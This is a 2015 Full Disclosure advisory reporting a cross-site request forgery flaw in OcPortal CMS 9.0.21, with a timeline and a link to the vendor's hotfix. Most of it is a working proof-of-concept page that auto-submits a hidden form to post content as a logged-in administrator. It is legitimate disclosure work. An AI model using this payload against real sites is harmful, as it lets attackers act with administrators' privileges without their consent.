Full Disclosure mailing list archives
OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
From: CSW Research Lab <disclose () cybersecurityworks com>
Date: Sat, 12 Dec 2015 20:23:55 +0530
================================================================ OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability ================================================================ Information ********************** Vulnerability Type : Cross-site Request Forgery (CSRF) Vulnerability Vulnerable Version : 9.0.21 Severity: High Author – Arjun Basnet CVE-ID: N/A Homepage: https://ocportal.com/site/sites.htm/ Description *********************** OcPortal CMS is prone to CSRF vulnerability bypasses referrer checks for checking forms posted to the system. It allows an attacker to trick administrators into submitting coded forms (i.e. coded actions) into the system which means an attacker can add an admin user and thus gain code execution Proof of Concept *************************** <!DOCTYPE> <html lang="en"> <head> <title>OcPortal 9.0.21 CSRF Vulnerability POC</title> </head> <body> <form action=" http://localhost/ocportal/cms/index.php?page=cms_news&type=_ad&uploading=1" enctype="multipart/form-data" method="post" id="formid"> <input type="hidden" name="MAX_FILE_SIZE" value="16777216" /> <input type="hidden" name="file1" value="" /> <input type="hidden" name="tick_on_form__validated" value="0" /> <input type="hidden" name="label_for__allow_rating" value="Allow rating" /> <input type="hidden" name="f_face" value="/" /> <input type="hidden" name="require__author" value="1" /> <input type="hidden" name="label_for__title" value="Title" /> <input type="hidden" name="file" value="" /> <input type="hidden" name="label_for__meta_description" value="Concise description" /> <input type="hidden" name="require__meta_description" value="0" /> <input type="hidden" name="validated" value="1" /> <input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" /> <input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" /> <input type="hidden" name="meta_description" value="Attack_OcPortal" /> <input type="hidden" name="allow_comments" value="1" /> <input type="hidden" name="comcode__news" value="1" /> <input type="hidden" name="http_referer" value=" http://localhost/ocportal/cms/index.php?page=cms_news&type=ad" /> <input type="hidden" name="author" value="Attack_OcPortal" /> <input type="hidden" name="pre_f_notes" value="1" /> <input type="hidden" name="post__is_wysiwyg" value="1" /> <input type="hidden" name="label_for__file" value="Image" /> <input type="hidden" name="comcode__title" value="1" /> <input type="hidden" name="require__news_category" value="0" /> <input type="hidden" name="allow_rating" value="1" /> <input type="hidden" name="tick_on_form__allow_rating" value="0" /> <input type="hidden" name="require__allow_comments" value="0" /> <input type="hidden" name="label_for__validated" value="Validated" /> <input type="hidden" name="label_for__notes" value="Notes" /> <input type="hidden" name="label_for__post" value="News article" /> <input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" /> <input type="hidden" name="label_for__main_news_category" value="Main category" /> <input type="hidden" name="f_size" value="" /> <input type="hidden" name="require__allow_rating" value="0" /> <input type="hidden" name="label_for__author" value="Source" /> <input type="hidden" name="require__title" value="1" /> <input type="hidden" name="comcode__post" value="1" /> <input type="hidden" name="news" value="Attack_OcPortal" /> <input type="hidden" name="post" value="Attack_OcPortal" /> <input type="hidden" name="require__validated" value="0" /> <input type="hidden" name="news__is_wysiwyg" value="1" /> <input type="hidden" name="require__notes" value="0" /> <input type="hidden" name="label_for__allow_comments" value="Allow comments" /> <input type="hidden" name="posting_ref_id" value="13973" /> <input type="hidden" name="f_colour" value="" /> <input type="hidden" name="label_for__news" value="News summary" /> <input type="hidden" name="require__meta_keywords" value="0" /> <input type="hidden" name="notes" value="Attack_OcPortal" /> <input type="hidden" name="title" value="Attack_OcPortal" /> <input type="hidden" name="require__file" value="0" /> <input type="hidden" name="require__main_news_category" value="1" /> <input type="hidden" name="label_for__news_category" value="Secondary categories" /> <input type="hidden" name="main_news_category" value="7" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> Severity Level: =============== High Vulnerable Product: =================== [+] OcPortal CMS 9.0.21 Advisory Timeline ************************ 12-Nov-2015- Reported 12-Nov-2015- Vendor released hotfix 12-Dec-2015- Public disclosed Fixed Version: ***************** Vendor has released the hotfix for this issue please refer below link: [+] http://ocportal.com/site/news/view/chris_grahams_blog/security-fix-for-csrf.htm Reference ***************** [+] http://ocportal.com/tracker/view.php?id=2074 [+] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) Credits & Authors ********************** Arjun Basnet from Cyber Security Works Pvt. Ltd. ( http://cybersecurityworks.com) -- ---------- Cheers !!! Team CSW Research Lab <http://www.cybersecurityworks.com> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability CSW Research Lab (Dec 13)